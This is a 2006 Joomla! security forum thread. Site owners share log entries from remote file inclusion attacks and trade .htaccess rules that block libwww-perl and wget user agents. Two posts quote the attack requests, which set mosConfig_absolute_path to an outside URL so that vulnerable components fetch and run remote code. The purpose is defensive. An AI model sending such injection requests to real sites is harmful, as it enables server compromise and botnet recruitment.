The Joomla! Forum ™

Download

Demo


Board index » Joomla! Older Version Support » Joomla! 1.0 » Security - 1.0.x

Forum rules


Forum Rules
Absolute Beginner's Guide to Joomla! <-- please read before posting, this means YOU.
Security Checklist
Forum Post Assistant - If you are serious about wanting help, you will use this tool to help you post.



Post new topic Reply to topic  Page 1 of 1
  [ 8 posts ] 
  Print view Previous topic | Next topic 
Author Message
sirarthur
 Post subject: Annoying IRC "hackers"
PostPosted: Mon Nov 20, 2006 2:13 am 
Joomla! Enthusiast
Joomla! Enthusiast
Offline

Joined: Thu Apr 20, 2006 1:47 pm
Posts: 165
Somehow, me and most of the people that runs joomla starts to get lines like those on its logs:

Code:
69.13.6.170 - - [20/Nov/2006:00:26:37 +0000] "GET /joomla/demo/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.superlist.gen.tr/lol1.txt? HTTP/1.0" 200 167 "-" "libwww-perl/5.53"


This is part of a script to trigger up your joomla instalation to work as part of some sort of IRC bot, made by an argentinian who got is website closed due to phishing (nice guy, uh?).

For now I solved that issue by insert this lines on my .htaccess file:

Code:
SetEnvIfNoCase User-Agent "^libwww-perl" no_perl
<Limit GET POST>
Order Allow,Deny
Allow from all
Deny from env=no_perl
</Limit>


I readed about other .htaccess way to block based on request, but since I don't know any real webbrowser based on libwww-perl, so I decided to block such client to access Joomla. You can also combine this with the .htaccess recomended on the top of the page.

_________________
Due to a HD failure my personal website is down... will try to get it back ASAP


Last edited by sirarthur on Mon Nov 20, 2006 2:21 am, edited 1 time in total.

Top
 Profile  
 
hilu
PostPosted: Mon Nov 20, 2006 10:44 am 
User avatar
Joomla! Intern
Joomla! Intern
Offline

Joined: Wed May 10, 2006 11:00 pm
Posts: 81
Location: uk
Dear Sir,
Thank you for the code.
I have just pasted it in my .htaccess file
Regards,

_________________
http://www.enad.co.uk


Last edited by hilu on Tue Nov 21, 2006 10:11 am, edited 1 time in total.

Top
 Profile  
 
friesengeist
PostPosted: Mon Nov 20, 2006 1:56 pm 
Joomla! Guru
Joomla! Guru
Offline

Joined: Sat Sep 10, 2005 10:31 pm
Posts: 842
sirarthur wrote:
Somehow, me and most of the people that runs joomla starts to get lines like those on its logs:

Quote:
69.13.6.170 - - [20/Nov/2006:00:26:37 +0000] "GET /joomla/demo/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=[...]? HTTP/1.0" 200 167 "-" "libwww-perl/5.53"



Just a FYI: If the size of the returned page is 167 bytes, the user received a message like this:
Quote:
Illegal variable _files or _env or _get or _post or _cookie or _server or _session or globals passed to script.


No need to block those attempts, as they didn't do any harm anyway.

_________________
We may not be able to control the wind, but we can always adjust our sails
Top
 Profile  
 
sirarthur
PostPosted: Mon Nov 20, 2006 2:11 pm 
Joomla! Enthusiast
Joomla! Enthusiast
Offline

Joined: Thu Apr 20, 2006 1:47 pm
Posts: 165
Yes, you're right, that's exactly the die response on those attempts.
However, and since someone may try with some other PERL script, I decided to close access to libwww-perl, I'm also concerning to restrict wget, the site aims for people not for scripts/bots.

_________________
Due to a HD failure my personal website is down... will try to get it back ASAP
Top
 Profile  
 
hilu
PostPosted: Tue Nov 21, 2006 9:55 am 
User avatar
Joomla! Intern
Joomla! Intern
Offline

Joined: Wed May 10, 2006 11:00 pm
Posts: 81
Location: uk
Dear Sirarthur,
You are a hero ......... :)
First time ever in my life as a helpless subject of hack attempts I felt happy after using your code. ;D
My sincere thanks to you.
My raw access log reads today like this

82.165.177.145 - - [20/Nov/2006:09:21:47 -0800] "GET /components/com_zoom/classes/fs_unix.php?mosConfig_absolute_path=http://www.superlist.gen.tr/lol1.txt? HTTP/1.1" 403 583 "-" "libwww-perl/5.79"

We want only human beings to use our site not any scripts
Kindly provide the other deny code you reffered about wget as well please.
Regards,

_________________
http://www.enad.co.uk


Last edited by hilu on Tue Nov 21, 2006 10:11 am, edited 1 time in total.

Top
 Profile  
 
sirarthur
PostPosted: Tue Nov 21, 2006 3:01 pm 
Joomla! Enthusiast
Joomla! Enthusiast
Offline

Joined: Thu Apr 20, 2006 1:47 pm
Posts: 165
For deny any other user-agent you just need to add two lines

eg:
SetEnvIfNoCase User-Agent "^wget" no_wget

and then

Deny from env=no_wget

Adding this to the previous .htaccess will look like:

SetEnvIfNoCase User-Agent "^libwww-perl" no_perl
SetEnvIfNoCase User-Agent "^wget" no_wget

Order Allow,Deny
Allow from all
Deny from env=no_perl
Deny from env=no_wget

_________________
Due to a HD failure my personal website is down... will try to get it back ASAP
Top
 Profile  
 
steve4j
PostPosted: Wed Nov 22, 2006 2:46 am 
I've been banned!
Offline

Joined: Sat Sep 03, 2005 3:37 pm
Posts: 143
sirarthur wrote:
For deny any other user-agent you just need to add two lines

eg:
SetEnvIfNoCase User-Agent "^wget" no_wget

and then

Deny from env=no_wget

Adding this to the previous .htaccess will look like:

SetEnvIfNoCase User-Agent "^libwww-perl" no_perl
SetEnvIfNoCase User-Agent "^wget" no_wget
<Limit GET POST>
Order Allow,Deny
Allow from all
Deny from env=no_perl
Deny from env=no_wget



I'm a little concerned with the syntax of the htaccess code there and the fact that it seems to overly complicate the htaccess to get the desired result.
It may also leave a loophole as well, considering it only seems to block GET and POST.. would a HEAD request on the url execute the exploit?

or, is it designed to work on servers that dont have MOD REWRITE?
Top
 Profile  
 
sirarthur
PostPosted: Wed Nov 22, 2006 3:18 am 
Joomla! Enthusiast
Joomla! Enthusiast
Offline

Joined: Thu Apr 20, 2006 1:47 pm
Posts: 165
HEAD doesn't output anything than the information of the size of the page called.

HEAD to my site's response:

Quote:
Client request

HEAD / HTTP/1.1
Host: http://www.sirarthur.info
Accept: text/html, application/xhtml+xml; q=0
Connection: Close

Server response

HTTP/1.1 200 OK
Date: Wed, 22 Nov 2006 03:05:03 GMT
Server: Apache/2.0.58 (Win32) PHP/5.1.4
Last-Modified: Sat, 04 Nov 2006 23:16:45 GMT
ETag: "c968-84d-bd3fed0"
Accept-Ranges: bytes
Content-Length: 2125
Connection: close
Content-Type: text/html
X-Pad: avoid browser bug


GET method, same page:

Quote:
Client request

GET / HTTP/1.1
Host: http://www.sirarthur.info
Accept: text/html, application/xhtml+xml; q=0
Connection: Close

Server response

HTTP/1.1 200 OK
Date: Wed, 22 Nov 2006 03:05:40 GMT
Server: Apache/2.0.58 (Win32) PHP/5.1.4
Last-Modified: Sat, 04 Nov 2006 23:16:45 GMT
ETag: "c968-84d-bd3fed0"
Accept-Ranges: bytes
Content-Length: 2125
Connection: close
Content-Type: text/html
X-Pad: avoid browser bug





SirArthur's Home Page


(... rest of the page's code...)



You can check your server's response by http://tagsoup.com/cookbook/http/get-head/

You're right however about it could be a loophole, once the page's code may be full executed on a HEAD request.l The problem is that without any output the script will not be able to know if the exploit succeded or not.
But it's an easy to solve problem aswell, just add HEAD to the limit tag:

_________________
Due to a HD failure my personal website is down... will try to get it back ASAP
Top
 Profile  
 
Display posts from previous:  Sort by  
Post new topic Reply to topic  Page 1 of 1
  [ 8 posts ] 


Board index » Joomla! Older Version Support » Joomla! 1.0 » Security - 1.0.x

Who is online

Users browsing this forum: No registered users and 2 guests

You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot post attachments in this forum

Jump to:  
Powered by phpBB® Forum Software © phpBB Group